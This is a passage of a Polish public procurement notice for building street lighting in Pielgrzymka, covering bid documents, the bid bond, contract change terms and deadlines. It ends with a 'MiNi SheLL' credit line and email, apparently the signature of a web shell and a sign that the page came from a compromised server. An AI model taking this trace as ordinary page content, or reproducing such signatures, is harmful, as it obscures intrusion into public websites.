dowodowych: </h3> 1) Dokumenty składane razem z ofertą:<br/>a) oferta składana jest pod rygorem nieważności w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym,<br/>b) wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu<br/>warunków udziału w postępowaniu w zakresie wskazanym w SWZ; oświadczenie to stanowi<br/>dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu, na dzień składania ofert, tymczasowo zastępujący wymagane podmiotowe środki<br/>dowodowe wskazane w ust. 7 pkt 1,<br/>c) oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2) Wykonawca jest zobowiązany złożyć także wraz z ofertą:<br/>a) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu; ( jeżeli dotyczy),<br/>b) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia z którego<br/>wynika, które roboty budowlane lub dostawy lub usługi wykonają poszczególni wykonawcy (<br/>jeżeli dotyczy),<br/>c) oświadczenie potwierdzające brak podstaw wykluczenia podwykonawcy, na których zasobach<br/>wykonawca nie polega przy wykazywaniu spełnienia warunków udziału w postępowaniu ( jeżeli<br/>dotyczy).<br/>3) Ponadto, jeżeli dotyczy, wykonawca do oferty załącza:<br/>a) zobowiązanie podmiotu udostępniającego zasoby,<br/>b) dokumenty, z których wynika prawo do podpisania oferty, tj. odpowiednie pełnomocnictwa,<br/>c) wykonawca załącza do oferty wykaz rozwiązań równoważnych z jego opisem lub normami. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty wykonawca załącza również: 1) zobowiązanie podmiotu udostępniającego zasoby (<br/>jeżeli dotyczy) 2) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie<br/>pełnomocnictwa (jeżeli dotyczy);3) wykaz rozwiązań równoważnych wykonawca załącza do<br/>oferty wykaz rozwiązań równoważnych z jego opisem lub normami (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie 3 000,00 zł (słownie: trzy tysiące złotych).<br/>2)	Wadium musi obejmować pełen okres związania ofertą.<br/>3)	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4)	Wadium w pieniądzu wnieść przelewem na rachunek bankowy zamawiającego – Nr 68 8658 0009 0019 7380 2000 0050 prowadzony w Powiatowym Banku Spółdzielczym w Złotoryi z zaznaczeniem na przelewie: „wadium – budowa oświetlenia w Pielgrzymce”. Wadium musi wpłynąć na wskazany rachunek bankowy najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego). <br/>5)	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib - beneficjentem wskazanym w gwarancji lub poręczeniu musi być Gmina Pielgrzymka, <br/>	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem, <br/>	kwotę gwarancji/poręczenia, <br/>	termin ważności gwarancji/poręczenia, <br/>	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie beneficjenta/zamawiającego w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie z art. 58 ustawy<br/>Pzp (dotyczy m.in. spółek cywilnych). W przypadku wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego:<br/>- wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.<br/>- wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z<br/>pełnomocnikiem.<br/>- jeżeli oferta Wykonawców, o których mowa w niniejszym punkcie zostanie wybrana,<br/>zamawiający zastrzega możliwość żądania przed zawarciem umowy w sprawie zamówienia<br/>publicznego, przedłożenia umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) przesunięcia terminu wykonania przedmiotu umowy z uwagi na niekorzystne warunki<br/>atmosferyczne uniemożliwiające wykonywanie prac (na okoliczność wystąpienia wymienionego<br/>faktu Wykonawca sporządzi notatkę służbową, która wymaga potwierdzenia przez Inspektora<br/>Nadzoru i zwróci się do zamawiającego z pisemnym wnioskiem o przesuniecie terminu<br/>wykonania przedmiotu umowy podając przyczynę i proponowany termin zakończenia prac, który<br/>nie może być dłuższy od faktycznego okresu przerwy lub postoju),<br/>2) przypadku zaistnienia okoliczności niezależnych od Wykonawcy, w szczególności z powodu:<br/>- istnienia braków w dokumentacji o czas niezbędny na ich uzupełnienie,<br/>- konieczności wykonywania części robót w inny sposób niż założony w projekcie,<br/>- wynagrodzenie dla robót zamiennych zostanie określone na podstawie stawek i cen<br/>jednostkowych podanych w oparciu o bieżącą wycenę tych robót,<br/>- opóźnienia dostępu do placu budowy,<br/>- w przypadku konieczności wykonania robót dodatkowych albo innych robót, które są niezbędnedo dokończenia realizacji przedmiotowego zamówienia,<br/>- wstrzymania robót przez organy administracji publicznej,<br/>- działania siły wyższej (np. klęski żywiołowe, strajki lokalne lub generalne) mające bezpośredni<br/>wpływ na terminowość wykonywanych robót),<br/>- zawieszenia zakresu robót przez Zamawiającego .<br/>3) rezygnacji z części pracy - w razie zaistnienia okoliczności, w których zbędne będzie<br/>wykonanie danej części zamówienia, wraz ze związanym z tym obniżeniem wynagrodzenia (w<br/>takim przypadku Wykonawca przygotuje przy udziale Zamawiającego protokół sporządzony na<br/>dzień rezygnacji, w którym Strony określą prace, z wykonania których Zamawiający zrezygnował<br/>oraz wysokość kwoty, o którą zostanie obniżone wynagrodzenie),<br/>4) konieczności wykonania robót zamiennych roboty zamienne będą mogły wystąpić wówczas,<br/>gdy część robót opisanych w dokumentacji nie będzie wykonywana zaś strony uzgodnią w tym<br/>samym zakresie wartościowym wykonanie innych, koniecznych robót.<br/>5) zmiany sposobu realizacji zamówienia - wynikającej ze zmian w obowiązujących przepisach<br/>prawa bądź wytycznych mających wpływ na realizację przedmiotu umowy,<br/>6) konieczności wykonywania robót nieprzewidzianych i niewycenionych w ofercie,<br/>7) zmiana osób wskazanych w umowie pełniących kontrolę i nadzór nad realizowanym<br/>zamówieniem:<br/>a) zmiany kierownika budowy (uzasadnienie ...),<br/>b) zmiany inspektora nadzoru inwestorskiego (uzasadnienie ...).<br/>8) innych istotnych postanowień umowy - gdy ich zmiana jest konieczna w związku ze zmianą<br/>przepisów prawa powszechnie obowiązującego w zakresie mającym wpływ na realizacje<br/>przedmiotu zamówienia , w tym również zmiany stawki podatku VAT,<br/>9) wartości zamówienia – łączna wartość zmian jest mniejsza niż progi unijne oraz jest niższa<br/>niż 15 % wartości pierwotnej umowy, a zmiany te nie powodują zmiany ogólnego charakteru<br/>umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-30 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://pzp.pielgrzymka.biz/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-30 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com